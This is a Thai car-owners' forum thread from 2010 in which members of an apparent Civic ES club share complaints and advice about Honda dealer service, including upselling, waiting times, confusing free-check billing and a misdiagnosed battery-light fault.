ตอบ
Jarkapong


ชื่อเล่น: พุ

เข้าร่วม: 23 ธันวา 2009
ตอบ: 190

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 480
ให้คำขอบคุณ: 265

ปี: 2001
ศุกร์, 19 กุมภา 2010 10:41 - ศูนย์บริการ Honda!
กระทู้นี้ไม่ได้โจมตีทางศูนย์ แต่ไม่มีทางไหนที่จะเป็นกระบอกเสียง
ให้กับผม และที่สำคัญผมใช้รถ Honda ด้วยและยิ่งไปกว่านั้น
ที่บ้านผมก็ใช้ยี่ฮ้อนี้หลายคันด้วย ผมคนหนึ่งล่ะไม่อยากให้คนที่เรารัก
ไปเสี่ยง หรือได้สิ่งไม่ดี
ผมว่าเราใช้ Internet ก็ง่ายต่อการรับรู้ข่าวสาร บางข่าวก็ผมยัง
คิดว่าไกลตัว แต่ก็เกิดกับเราได้ ผมตามข้อมูลอยู่แต่ก็ไม่มีความคืบหน้า

บ.เอกอินทราฮอนด้า 02-5538000
กรณี Honda Accord V6 ออกจากศูนย์แล้วไฟไหม้รถ
ผมไปถามที่ศูนย์ ศูนย์ไม่ให้คำตอบ

บ.พัทยาฮอนด้าคาร์ส 038-727315-20
กรณี Honda Civic ES01 ออกจากศูนย์แล้วแล้วรถมีปัญหา
และทางศูนย์สับเปลี่ยนอะไหล่จากคันอื่นมาใส่ให้
ผมโทรฯไป ทางศูนย์ก็ไม่ให้คำตอบ


ทั้งสองกรณีผมโทรฯไปที่ Honda call center 02-3417777 02-3417888 02-3417999
ทางบ.บอกว่าเป็นความจริงแต่เป็นความลับ สรุปยังไงเนี๊ย ผมก็เป็นลูกค้า
หน้าที่ลูกค้าคือห้ามรู้ในสิ่งที่ไม่ดี ผมไม่ได้ติเพื่อทำลายน่ะ แต่อยากให้พัฒนา

และที่เจอกับตัวเรื่องส่งรถบ่อยครั้ง "รถเสร็จแล้วค่ะ คุณต้องมาก่อน.......น่ะค่ะ"
พอไปถึงชำระเงินก่อนเลยครับ พอจ่ายเสร็จ แล้วรถผมล่ะ "อยู่ระหว่างล้างค่ะ"
"อยู่ระหว่างตรวจเช็คค่ะ" "เชิญทาน.......ในห้องพักผ่อนก่อนค่ะ"
แล้วไอ้ที่ผมรีบมาทุกครั้งล่ะ สรุปผมเชื่อคนง่ายใช่ไห๊ม ไอ้นู้นเสียเปลี่ยน
ไอ้นี้ไม่ดีเปลี่ยน และที่รีบมาหวังของกินใช่ไห๊ม คนไทยชอบมาสาย
เลยนัดมันมาก่อน
ก่อนออกตั้งไอ้โน้นให้แล้ว แต่งไอ้นี้ให้แล้ว
เอาโคมไฟหน้าล่ะกันชัดดี(มันแค่หมองๆ เปลี่ยนเลยล่ะกันอันเก่าเอาไปขัดทำเป็นอะไหล่)
ออกมาวุ่นอยู่กับเอกสารให้รปภ. และมองดูวีรกรรมต่างๆในรถ(ใส่ร้ายเค้าไปไหมเนี๊ย)
พอออกถนนใหญ่คุณพ่อ คุณแม่ผมนั่งอยู่ที่บ้านสะดุ้งกันใหญ่เลย
ทำไมหรือครับ ไฟต่ำเท่าไฟสูง ไฟสูงเท่ายอดตึก และยังมีอีกแยะเอาแค่นี้ก่อน
สักหนึ่งถึงสองวันจะมีโทรฯเข้าตรวจสอบ ผมเล่าให้ฟัง และได้คำตอบว่า
"ช่วงเทศกาล รถแยะ(แล้วไงเนี๊ย รถแยะคุณภาพเลยไม่ดีเลยหรอ)ถ้าเป็นไปได้ต้องเลี่ยง"
(ปีใหม่ สงกรานต์ หรือหยุดต่อเนื่อง)ยังไงเนี๊ยผมเช็คทุก 5,000 โล.ผมเลือกไม่ได้หรอก
ว่าตอนไหน และช่วงก่อนเทศกาลผมก็อยากไปพักผ่อน ผมก็อยากให้รถพร้อมน่ะ


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 19 กุมภา 2010 11:53, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
RG.KiD


ชื่อเล่น: โอ๊ก

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 2214

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4800
ให้คำขอบคุณ: 4461

ที่อยู่: Nonthaburi ~ Sukha III ~ Suksawas
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 19 กุมภา 2010 10:54 - ศูนย์บริการ Honda!
ของผมก็เจอแต่ว่า..

ณ 14.00 น.
พนักงาน: "ต้องเปลี่ยนอุปกรณ์........นะครับ.. จะเปลี่ยนไหมครับ?"
ผม: "ยังไม่เปลี่ยนครับ.."
พนักงาน: "งั้น.. เดี๋ยวเสร็จเรียบร้อยแล้ว จะโทรไปแจ้งมารับรถนะครับ.."
ผม: "ครับ.."

ณ 17.00 น.
ผม: "รถผมเสร็จหรือยังครับ"
พนักงาน: "เสร็จนานแล้วค่ะ.."
ผม: "อ้าวววว... แล้วให้กรูรอทำไมตั้งนานฟระ?????"........... อันนี้คิดในใจ 555+

ทั้งๆ ที่ผมแจ้งไปแล้วว่าไม่เปลี่ยน ก็น่าจะแค่ล้างรถแล้วก็ตามไปรับรถได้เลยนี่นา.. แต่ก็เงียบไป... แล้วต้องเป็นฝ่ายโทรไปถามเอง เพราะจะกลับบ้านแล้ว ไม่มีรถ..!!


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 19 กุมภา 2010 11:00, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Jarkapong  sukhothai  kobon  kaisuh  es330  whitechoc  Guide6351  kaorjang  BLACK_CHERRY04  CeaSaR  kim_possible  aun99  hacker  maxch  Fil-reD  okuma  gahn27  Phetcharat 
RG.KiD


ชื่อเล่น: โอ๊ก

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 2214

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4800
ให้คำขอบคุณ: 4461

ที่อยู่: Nonthaburi ~ Sukha III ~ Suksawas
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 19 กุมภา 2010 10:58 - ศูนย์บริการ Honda!
ยังมีอีก.....

ผม: "เอารถมาเช็คตามระยะ... 120,000 KM. ครับ.."
พนักงาน: "ค่ะ.. มีเช็ค..blah blah blah!!! นะคะ"
ผม: "ครับ.. แล้วเปลี่ยนถ่ายน้ำมันต่างๆ ตามนี้ให้ผมด้วย.."
พนักงาน: "ค่ะ.. ช่วงนี้มีบริการเช็คร้อยล้านรายการฟรีนะคะ..."
ผม: "ครับ.."

บิลมา....
1. ค่าเช็คร้อยล้านรายการ.... ฟรี
2. ค่าเช็คระยะ 120,000 KM..... XXX บาท

รวม XXX บาท

อ้าววววววว แล้วอั้ยเช็ค 120,000 KM. กับเช็คร้อยล้านรายการ มันต่างกันยังไงฟระ?
สุดท้าย.. ก็เก็บตังก์ตรูอยู่ดีอ่ะ........
ได้รับคำขอบคุณจาก: Jarkapong  kaisuh  es330  mod_x  whitechoc  saw  kaorjang  CeaSaR  aun99  hacker  maxch  Doraeman  Fil-reD  okuma  gahn27  Phetcharat 
Jarkapong


ชื่อเล่น: พุ

เข้าร่วม: 23 ธันวา 2009
ตอบ: 190

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 480
ให้คำขอบคุณ: 265

ปี: 2001
ศุกร์, 19 กุมภา 2010 11:27 - ศูนย์บริการ Honda!
ชอบอันหลังน่ะ :D
ถ้าวันนั้นเครียดๆไป "เช็ค 120,000 และเช็คร้อยล้านรายการ ฟรี....."
"มีค่าใช้จ่าย......." ผมจะสวนเลย "รับเช็คเด้งไหม๊"

ไม่รู้ศูนย์จะสวนมา เช็คล้านแปดรายการฟรีไห๊มค่ะ ทิ้งรถได้เลย"

ศูนย์เค้าจะมาอ่านข้อความผมไห๊มเนี๊ย :|

ข้อความทุกข้อความเป็นหลักฐานสำหรับศาล ผมแย่เลยน่ะ
ได้รับคำขอบคุณจาก: RG.KiD  mod_x  whitechoc  Guide6351  kaorjang  hacker  gahn27  Phetcharat 
RG.KiD


ชื่อเล่น: โอ๊ก

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 2214

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4800
ให้คำขอบคุณ: 4461

ที่อยู่: Nonthaburi ~ Sukha III ~ Suksawas
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 19 กุมภา 2010 11:38 - ศูนย์บริการ Honda!
555+ มะใช่หรอกครับ..
พนักงานเค้าบอกว่า "มีเช็ค 20 รายการฟรีนะคะ.." ประมาณนี้ครับ.. เป็นช่วงปีใหม่น่ะครับ เช็คฟรี! 20 รายการไรงี้..
แต่ผมดูๆ รายการที่เค้าเช็ค มันก็คือ รายการตามใน List เช็ค 120,000 KM น่ะครับ
แล้วงี้.. ทำไมไม่บอกผมล่ะว่า ทางเราจะเช็คให้ฟรีค่ะ คิดแค่ค่าน้ำมันต่างๆ กับค่าแรง...

สรุปก็คือ ผมเสียค่าโง่เองแหละ เพราะยังไงทาง Honda ก็คงต้องการผลประโยชน์ของเค้าอยู่แล้ว
แล้วอั้ยเช็ค 20 รายการเนี่ย.. เช็คก็คือ.. เปิดดูเฉยๆ? เพราะบูชปีกนกผมร้าว เค้ายังไม่เห็นบอกผมเลย.. ต้องให้พี่ใหม่จัดการให้อ่ะ

ปล. ผมว่า ถ้าเค้าเห็น เค้าน่าจะเอาไปปรับปรุงการให้บริการของเค้ามากกว่า ไม่ใช่มาดำเนินการอะไรกับลูกค้าครับ..
สมัยนี้.. น่าจะยังเป็น "ลูกค้า คือ พระเจ้า" นะครับ.. เพราะถ้าไม่รักษาลูกค้าไว้ บริษัทเค้าเองแหละ ที่จะอยู่ไม่ได้..
ได้รับคำขอบคุณจาก: Jarkapong  kaisuh  es330  mod_x  whitechoc  Guide6351  kaorjang  hacker  maxch  gahn27  Phetcharat 
DRINK


เข้าร่วม: 04 ตุลา 2008
ตอบ: 3856

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ที่อยู่: Paris + Bangkok + Uttaradit + Phitsanulok
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 19 กุมภา 2010 11:43 - ศูนย์บริการ Honda!
กำลังจะไป 0 อ่านแล้วเครียดมาเลยทีเดียว
ได้รับคำขอบคุณจาก: Jarkapong  RG.KiD  es330  kaorjang  hacker 
HaMon_ES02


เข้าร่วม: 27 ตุลา 2008
ตอบ: 1601

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1307
ให้คำขอบคุณ: 2674

ที่อยู่: กรุงเทพฯ - นนท์ ชลบุรี เมืองน่าน THE GANG
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 19 กุมภา 2010 12:06 - ศูนย์บริการ Honda!
เบื่อ....ไม่อยากจะพูดถึงมันแล้วครับ
ได้รับคำขอบคุณจาก: RG.KiD  Jarkapong  es330  kaorjang  hacker 
soloshot


ชื่อเล่น: แฟลช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 1243

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2428
ให้คำขอบคุณ: 1275

ที่อยู่: ประชาอุทิศ (ทุ่งครุ)
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 19 กุมภา 2010 12:57 - ศูนย์บริการ Honda!
ลองเข้าไปเช็ค ที่ศูนย์ดูก่อนครับ
ถ้าเขาแจ้งอะไรมา
ก็ลองพิจารณา และเช็คราคาดูก่อน

ถ้าราคาไม่แพงกว่าเท่าไร ก็เปลี่ยนไป
ถ้าแพงมาก ก็ออกมาเปลี่ยนข้างนอกดีกว่า
ได้รับคำขอบคุณจาก: RG.KiD  Jarkapong  es330  Guide6351  kaorjang  hacker  maxch 
xcyber


ชื่อเล่น: เอ็กซ์

เข้าร่วม: 30 ตุลา 2008
ตอบ: 1105

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1281
ให้คำขอบคุณ: 217

ที่อยู่: เจริญนคร
ปี: 2001
ศุกร์, 19 กุมภา 2010 13:10 - ศูนย์บริการ Honda!
ได้รับคำขอบคุณจาก: Jarkapong  RG.KiD  es330  Guide6351  hacker 
kim_possible


ชื่อเล่น: หนู

เข้าร่วม: 10 ตุลา 2008
ตอบ: 2677

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2006
ให้คำขอบคุณ: 6407

ที่อยู่: Kanchanaburi
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 19 กุมภา 2010 13:14 - ศูนย์บริการ Honda!
ได้รับคำขอบคุณจาก: RG.KiD  es330  Jarkapong  hacker 
Tinkky


ชื่อเล่น: โอ๋หลังวัง

เข้าร่วม: 02 ตุลา 2008
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 655
ให้คำขอบคุณ: 667

ที่อยู่: รังสิต - อยุธยา - ลพบุรี
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 19 กุมภา 2010 13:19 - ศูนย์บริการ Honda!
อย่าพึ่งตีรวมว่า ศูนย์บริการ แย่ไปซะหมดครับ
ใช้ความคิด คิดต่อจากสิ่งที่เขาบอก อีกหลายๆ รอบ พิจารณาเหตุผล ให้เขาชี้แจงให้หมด แล้วซักถามด้วยสติ
ใจเย็นๆ ทำหรือไม่ทำ อยู่ที่เราครับ เงินเรา รถเรา
พูดกับเขาดีๆ เขาก็บริการดีนะครับ
ได้รับคำขอบคุณจาก: RG.KiD  kaisuh  Guide6351  Jarkapong  fff_1232  hacker  maxch  gahn27  Phetcharat 
muu


ชื่อเล่น: หมู

เข้าร่วม: 13 ตุลา 2008
ตอบ: 1517

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1423
ให้คำขอบคุณ: 1547

ที่อยู่: Hua Hin
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 19 กุมภา 2010 13:26 - ศูนย์บริการ Honda!
ได้รับคำขอบคุณจาก: RG.KiD  es330  Jarkapong  hacker 
moodum


เข้าร่วม: 13 กุมภา 2010
ตอบ: 23

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 5

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 19 กุมภา 2010 13:43 - ศูนย์บริการ Honda!
ของผมก็พึ่งไปเช็ค 120,000 km มาเหมือนกัน รายละเอียดเพิ่มเติมที่ช่างบอก คือ แร็คพวงมาลัยรั่ว+ยางหุ้มโช็ค(หรือว่าอะไรซักอย่างนี่แหละ)ด้านหน้า ซ้าย ขวา เสื่อมสภาพต้องเปลี่ยนใหม่ แต่........ พนักงานบอกผมว่าโช็คหน้าพังต้องเปลี่ยนโช็ค อ่าว..... ไงกันอ่ะ
ได้รับคำขอบคุณจาก: RG.KiD  Guide6351  Jarkapong  hacker 
es330


เข้าร่วม: 10 พฤศจิกา 2008
ตอบ: 1890

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3172
ให้คำขอบคุณ: 6546

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 19 กุมภา 2010 16:37 - ศูนย์บริการ Honda!
RG.KiD พิมพ์ว่า:
ยังมีอีก.....

ผม: "เอารถมาเช็คตามระยะ... 120,000 KM. ครับ.."
พนักงาน: "ค่ะ.. มีเช็ค..blah blah blah!!! นะคะ"
ผม: "ครับ.. แล้วเปลี่ยนถ่ายน้ำมันต่างๆ ตามนี้ให้ผมด้วย.."
พนักงาน: "ค่ะ.. ช่วงนี้มีบริการเช็คร้อยล้านรายการฟรีนะคะ..."
ผม: "ครับ.."

บิลมา....
1. ค่าเช็คร้อยล้านรายการ.... ฟรี
2. ค่าเช็คระยะ 120,000 KM..... XXX บาท

รวม XXX บาท

อ้าววววววว แล้วอั้ยเช็ค 120,000 KM. กับเช็คร้อยล้านรายการ มันต่างกันยังไงฟระ?
สุดท้าย.. ก็เก็บตังก์ตรูอยู่ดีอ่ะ........


ชอบจังคำนี้ Check ร้อยล้านแต่เก็บตังค์กรู
ได้รับคำขอบคุณจาก: RG.KiD  Guide6351  Jarkapong  hacker 
Anakin


ชื่อเล่น: เอก

เข้าร่วม: 31 กรกฎา 2009
ตอบ: 1119

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 910
ให้คำขอบคุณ: 1439

ที่อยู่: Korat - Rayong
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 19 กุมภา 2010 16:56 - ศูนย์บริการ Honda!
ได้รับคำขอบคุณจาก: RG.KiD  Jarkapong  hacker 
minezoo


เข้าร่วม: 17 พฤศจิกา 2008
ตอบ: 492

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 532
ให้คำขอบคุณ: 207

ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
ศุกร์, 19 กุมภา 2010 17:50 - ศูนย์บริการ Honda!
ไม่มี ที่ไหน ดีเลิศ ประ เสิศ ศรี

เพราะ ทั้ง 0 และ ร้าน นอก ไม่ เชี่ยวชาญใน ทุกๆ เรื่อง หรอกครับ

บางเรื่อง ทำที่ 0 เพราะ ร้าน ข้างนอก มันชุ่ย บอกว่าทำได้ เพราะอยากได้งาน ปรากด รื้อ ซะ เละ

เรื่อง ทั่วๆ ไป ทำร้่าน นอก ที่เคย ทำ ครับ

น้ำมัน เกีย เปลี่ยน 0 ถูก กว่า ครับ 7xx รวมค่าแรง

การสอบถามเอาจากคนที่เคยทำ น่าจะดีที่สุด ครับ

ที่สำคัญ ตอนนี้ 0 ทุก 0 ไม่ใช่ ของ Honda แล้วครับ
ได้รับคำขอบคุณจาก: RG.KiD  Guide6351  Jarkapong  hacker  gahn27  Phetcharat 
RG.KiD


ชื่อเล่น: โอ๊ก

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 2214

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4800
ให้คำขอบคุณ: 4461

ที่อยู่: Nonthaburi ~ Sukha III ~ Suksawas
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 19 กุมภา 2010 21:51 - ศูนย์บริการ Honda!
ถูกครับ.. ไม่มีที่ไหนดีที่สุดครับ
ถ้าเรามีแหล่ง หรือร้านที่ไว้ใจได้ หรือเราพอมีเวลาที่จะหาร้านดีๆ ถูกๆ ทำอ่ะเนาะ..

แต่ผมเซ็งตรงที่.. เช็ครายการอื่นๆ ตามกิโล กับรายการฟรีที่เค้าให้ มันก็เหมือนกัน
ทำไมเค้าไม่บอกว่า ไม่ต้องเช็คอันนี้ก็ได้ เพราะยังไงช่วงนี้ก็เช็คฟรี แล้วค่อยให้เราเปลี่ยนน้ำมันต่างๆ เองล่ะ

ก็แสดงว่า "จะเอาตังก์....จากลูกค้าให้เยอะที่สุด.." ว่างั้นหรอครับ?
บาง 0 ก็ดีครับ.. ไม่น่าเปลี่ยน 0 เล้ยยยย..
ได้รับคำขอบคุณจาก: Guide6351  Jarkapong  hacker  gahn27 
monkey-es


ชื่อเล่น: อ็อบ

เข้าร่วม: 30 ธันวา 2008
ตอบ: 672

Guru ES
Guru ES

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 1026

ที่อยู่: Live carwash พุทธมนทลสายสอง
ปี: 2003
สี: แดง แรลไล (R-513)
ศุกร์, 19 กุมภา 2010 21:52 - ศูนย์บริการ Honda!
รถเรา เราดูแลเองดีที่สุดครับ บางอย่างไปเชื่อ อู่หรือ ศูนย์ มากก็ไม่ดี เพราะแต่ ละที่ก็ชำนาญคนละด้าน หรือไม่ ชำนาญเลยก็มีนะ
สุดท้ายเราก็ต้อง สังเกตุอาการด้วยตัวเอง ทุกครั้ง ที่เอา ออกจากศูนย์ และ อู่ ผมต้องเช็คเองทุกจุด เพราะไม่มีใครรักรถเราเท่าตัวเราหรอกครับ นะ
ได้รับคำขอบคุณจาก: RG.KiD  Guide6351  Jarkapong  hacker 
wutdy


ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

ปี: 2001
ศุกร์, 19 กุมภา 2010 22:31 - ศูนย์บริการ Honda!
ดีที่ยังไม่เคยเจอ ผมเช็คที่ ศูนย์รัตนาธิเบศ อะ
ได้รับคำขอบคุณจาก: RG.KiD  Jarkapong  hacker  Phetcharat 
RG.KiD


ชื่อเล่น: โอ๊ก

เข้าร่วม: 28 พฤศจิกา 2009
ตอบ: 2214

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4800
ให้คำขอบคุณ: 4461

ที่อยู่: Nonthaburi ~ Sukha III ~ Suksawas
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 19 กุมภา 2010 22:47 - ศูนย์บริการ Honda!
wutdy พิมพ์ว่า:
ดีที่ยังไม่เคยเจอ ผมเช็คที่ ศูนย์รัตนาธิเบศ อะ

แหล่มครับ.. 0 นี้... ผมก็ใช้อยู่ตลอด
แต่เห็นอีก 0 นึงใกล้ๆ ที่ทำงานเลยลองเปลี่ยนดูน่ะครับ...
ได้รับคำขอบคุณจาก: Guide6351  Jarkapong  hacker 
pook_authorized


เข้าร่วม: 04 กรกฎา 2009
ตอบ: 66

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 113
ให้คำขอบคุณ: 12

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 20 กุมภา 2010 01:21 - ศูนย์บริการ Honda!
รายได้หลักๆของศูนย์ฯ นอกจากการขายรถแล้ว
ก็คือการซ่อมและขายอะไหล่ฯ ซึ่งหากรถมีปํญหา
เกี่ยวกับอุปกรณ์ต่างๆลูกค้าจะถูกแนะนำให้
เปลี่ยนใหม่ซึ่งเป็นงานง่ายและ ?จบ? ได้เร็ว
จุดนี้หากเป็นศูนย์ฯที่มีนโยบายที่ไม่เน้นขายอะไหล่
เกินไปรวมถึงได้ช่างที่มีความรู้ ความสามารถมอง
ปัญหาได้ตรงจุดและเป็นระบบ ลูกค้าก็ Happy

การแก้ไขปัญหาของรถของช่างนั้นสามารถทำได้ในแบบ
?แนวดิ่ง? คือช่างจะไล่หาสาเหตุจากล่างขึ้นบน หรือบน
ลงล่าง เปรียบเทียบคือ หาสาเหตุจากจุดที่ง่ายที่สุดเพื่อ
ให้ลูกค้าประหยัดเงิน ถ้าไม่หายจึงไล่เป็นขั้นที่สูงขึ้นไป
กับไล่จากจุดบนสุดเปลี่ยนอะไหล่ราคาแพงๆเพื่อจะได้
ปริมาณการขายอะไหล่ของศูนย์ฯ
เจอมากับตัวเองครับ ไฟรูปแบตฯโชว์ ขับไปที่ศูนย์ฯใกล้บ้าน
ช่างบอกต้องเปลี่ยนไดชาร์จ รวมค่าแรงแล้วประมาณหมื่นฯ
ตอนนั้นจะขับออกมาก็ไม่ได้เพราะไม่มีไฟเหลือพอสตาร์ทแล้ว
เลยยอมจอดซ่อมที่นี่ใช้เวลา 2 วันเต็มแต่หลังจากเปลี่ยนไดชาร์จ
ไฟก็ยังโชว์เหมือนเดิม คราวนี้ช่างบอกให้ผมไปรื้อเครื่องเสียงทั้งหมด
(แสนกว่าบาท) ออกเพราะคิดว่าไฟรั่วซึ่งผมบอกว่าแค่ถอดสายไฟชุดเครื่องเสียงออก
จากขั้วบวกของแบตฯ เครื่องเสียงทั้งระบบก็ไม่มีไฟไปแล้ว แต่ช่างก็ยืนยันเหมือนเดิม

เลยตัดสินใจขับประคองรถเข้าศูนย์ฯที่ซื้อรถมา ปรากฎใช้เวลาประมาณ 2 ชั่วโมง
ศูนย์ฯโทรมาแจ้งว่ารถเสร็จแล้ว ไฟแบตฯโชว์เพราะ ?ฟิวส์ ขาด 1 ตัว?
ค่าใช้จ่ายร้อยกว่าบาท (ผมยังเก็บใบเสร็จฯของทั้ง 2 ศูนย์ฯไว้จนทุกวันนี้)

ตอนนี้ทราบมาว่าทาง Honda Thailand มีหน่วยตรวจวิเคราะห์อาการ
ของรถโดยจะมีจนท.ของ Honda เองออกไปตรวจสอบรถของลูกค้าที่เสีย
ตาม Dealer และมีปัญหาว่าควรจะต้องตรวจเช็คหรือเปลี่ยนส่วนไหน
ชื่อหน่วย ซี .. อะไรนี่แหละครับ (ไว้ผมจะตามรายละเอียดให้เพราะลืมไปแล้วครับ)
หรือถ้ายังไงให้แจ้งที่แผนกบริการของศูนย์ฯ ว่าเราอยากให้ จนท.ของ Honda
มาตรวจสอบเพื่อความมั่นใจก่อนตัดสินใจก็ได้นะครับ

โชคดีครับ
ได้รับคำขอบคุณจาก: RG.KiD  Guide6351  monkey-es  Jarkapong  kittidech  jukkadui  hacker  maxch  okuma  gahn27  Phetcharat 
NINJASIAM


ชื่อเล่น: นิน

เข้าร่วม: 06 มกรา 2010
ตอบ: 1621

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2025
ให้คำขอบคุณ: 4537

ที่อยู่: Chiang Mai
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 20 กุมภา 2010 02:00 - ศูนย์บริการ Honda!
pook_authorized พิมพ์ว่า:
รายได้หลักๆของศูนย์ฯ นอกจากการขายรถแล้ว
ก็คือการซ่อมและขายอะไหล่ฯ ซึ่งหากรถมีปํญหา
เกี่ยวกับอุปกรณ์ต่างๆลูกค้าจะถูกแนะนำให้
เปลี่ยนใหม่ซึ่งเป็นงานง่ายและ ?จบ? ได้เร็ว
จุดนี้หากเป็นศูนย์ฯที่มีนโยบายที่ไม่เน้นขายอะไหล่
เกินไปรวมถึงได้ช่างที่มีความรู้ ความสามารถมอง
ปัญหาได้ตรงจุดและเป็นระบบ ลูกค้าก็ Happy

การแก้ไขปัญหาของรถของช่างนั้นสามารถทำได้ในแบบ
?แนวดิ่ง? คือช่างจะไล่หาสาเหตุจากล่างขึ้นบน หรือบน
ลงล่าง เปรียบเทียบคือ หาสาเหตุจากจุดที่ง่ายที่สุดเพื่อ
ให้ลูกค้าประหยัดเงิน ถ้าไม่หายจึงไล่เป็นขั้นที่สูงขึ้นไป
กับไล่จากจุดบนสุดเปลี่ยนอะไหล่ราคาแพงๆเพื่อจะได้
ปริมาณการขายอะไหล่ของศูนย์ฯ
เจอมากับตัวเองครับ ไฟรูปแบตฯโชว์ ขับไปที่ศูนย์ฯใกล้บ้าน
ช่างบอกต้องเปลี่ยนไดชาร์จ รวมค่าแรงแล้วประมาณหมื่นฯ
ตอนนั้นจะขับออกมาก็ไม่ได้เพราะไม่มีไฟเหลือพอสตาร์ทแล้ว
เลยยอมจอดซ่อมที่นี่ใช้เวลา 2 วันเต็มแต่หลังจากเปลี่ยนไดชาร์จ
ไฟก็ยังโชว์เหมือนเดิม คราวนี้ช่างบอกให้ผมไปรื้อเครื่องเสียงทั้งหมด
(แสนกว่าบาท) ออกเพราะคิดว่าไฟรั่วซึ่งผมบอกว่าแค่ถอดสายไฟชุดเครื่องเสียงออก
จากขั้วบวกของแบตฯ เครื่องเสียงทั้งระบบก็ไม่มีไฟไปแล้ว แต่ช่างก็ยืนยันเหมือนเดิม

เลยตัดสินใจขับประคองรถเข้าศูนย์ฯที่ซื้อรถมา ปรากฎใช้เวลาประมาณ 2 ชั่วโมง
ศูนย์ฯโทรมาแจ้งว่ารถเสร็จแล้ว ไฟแบตฯโชว์เพราะ ?ฟิวส์ ขาด 1 ตัว?
ค่าใช้จ่ายร้อยกว่าบาท (ผมยังเก็บใบเสร็จฯของทั้ง 2 ศูนย์ฯไว้จนทุกวันนี้)

ตอนนี้ทราบมาว่าทาง Honda Thailand มีหน่วยตรวจวิเคราะห์อาการ
ของรถโดยจะมีจนท.ของ Honda เองออกไปตรวจสอบรถของลูกค้าที่เสีย
ตาม Dealer และมีปัญหาว่าควรจะต้องตรวจเช็คหรือเปลี่ยนส่วนไหน
ชื่อหน่วย ซี .. อะไรนี่แหละครับ (ไว้ผมจะตามรายละเอียดให้เพราะลืมไปแล้วครับ)
หรือถ้ายังไงให้แจ้งที่แผนกบริการของศูนย์ฯ ว่าเราอยากให้ จนท.ของ Honda
มาตรวจสอบเพื่อความมั่นใจก่อนตัดสินใจก็ได้นะครับ

โชคดีครับ


ถ้ามีหน่วยงานนี้มาดูแลได้ทั่วถึงก็คงดีนะครับ
ได้รับคำขอบคุณจาก: Guide6351  Jarkapong  hacker 
GOLFER


เข้าร่วม: 01 ตุลา 2008
ตอบ: 363

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 171
ให้คำขอบคุณ: 320

ที่อยู่: BANGKOK-NAKHONPATHOM
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 26 กุมภา 2010 14:07 - ศูนย์บริการ Honda!
ผมว่าศูนย์บริการมีทั้งที่ดีและไม่ดีนะครับแล้วแต่นโยบายของศูนย์นั้นๆนะครับ
ส่วนผมมีช่างอยู่ที่ศูนย์เลยให้เช็คและทำอะไรฟรีๆบ่อยครับเลยไม่ค่อยเสียค่าบริการอะไรมากมาย
อย่างอะไหล่อันไหนแพงก็แนะนำให้ออกไปทำข้างนอก
